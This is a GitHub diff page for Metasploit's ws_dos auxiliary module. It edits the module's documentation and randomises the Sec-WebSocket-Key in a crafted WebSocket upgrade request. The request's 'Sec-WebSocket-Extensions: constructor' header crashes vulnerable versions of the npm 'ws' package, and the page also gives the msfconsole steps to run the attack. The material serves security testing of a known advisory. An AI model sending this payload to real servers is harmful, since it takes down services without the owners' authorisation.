File tree Expand file tree Collapse file tree 2 files changed +8
-12
lines changed
documentation/modules/auxiliary/dos/http
modules/auxiliary/dos/http Expand file tree Collapse file tree 2 files changed +8
-12
lines changed Original file line number Diff line number Diff line change 1
1
## Vulnerable Application
2
-
3
- [ ws < 1.1.5 || (2.0.0 , 3.3.1)]
4
- (https://nodesecurity.io/advisories/550 )
2
+ ws < 1.1.5 || (2.0.0 , 3.3.1)
3
+ https://nodesecurity.io/advisories/550
5
4
6
5
## Vulnerable Analysis
7
-
8
- This module exploits a Denial of Service vulnerability in npm module "ws".
9
- By sending a specially crafted value of the Sec-WebSocket-Extensions header
10
- on the initial WebSocket upgrade request, the ws component will crash.
6
+ This module exploits a Denial of Service vulnerability in npm module "ws".
7
+ By sending a specially crafted value of the Sec-WebSocket-Extensions header
8
+ on the initial WebSocket upgrade request, the ws component will crash.
11
9
12
10
## Verification Steps
13
-
14
11
1 . Start the vulnerable server using the sample server code below ` node server.js `
15
12
2 . Start ` msfconsole `
16
13
3 . ` use auxiliary/dos/http/ws_dos `
17
- 4 . ` set RHOST XXX.XXX.XXX.XXX `
14
+ 4 . `set RHOST < IP >
18
15
5 . ` run `
19
16
6 . The server should crash
20
17
21
18
## Options
22
-
23
- None.
19
+ None.
24
20
25
21
## Scenarios
26
22
Original file line number Diff line number Diff line change @@ -40,7 +40,7 @@ def run
40
40
req = [
41
41
"GET #{ path } HTTP/1.1" ,
42
42
"Connection: Upgrade" ,
43
- "Sec-WebSocket-Key: test " ,
43
+ "Sec-WebSocket-Key: #{ Rex :: Text . rand_text_alpha ( rand ( 10 ) + 5 ) . to_s } " ,
44
44
"Sec-WebSocket-Version: 8" ,
45
45
"Sec-WebSocket-Extensions: constructor" , #Adding "constructor" as the value for this header causes the DoS
46
46
"Upgrade: websocket" ,
You can’t perform that action at this time.
0 commit comments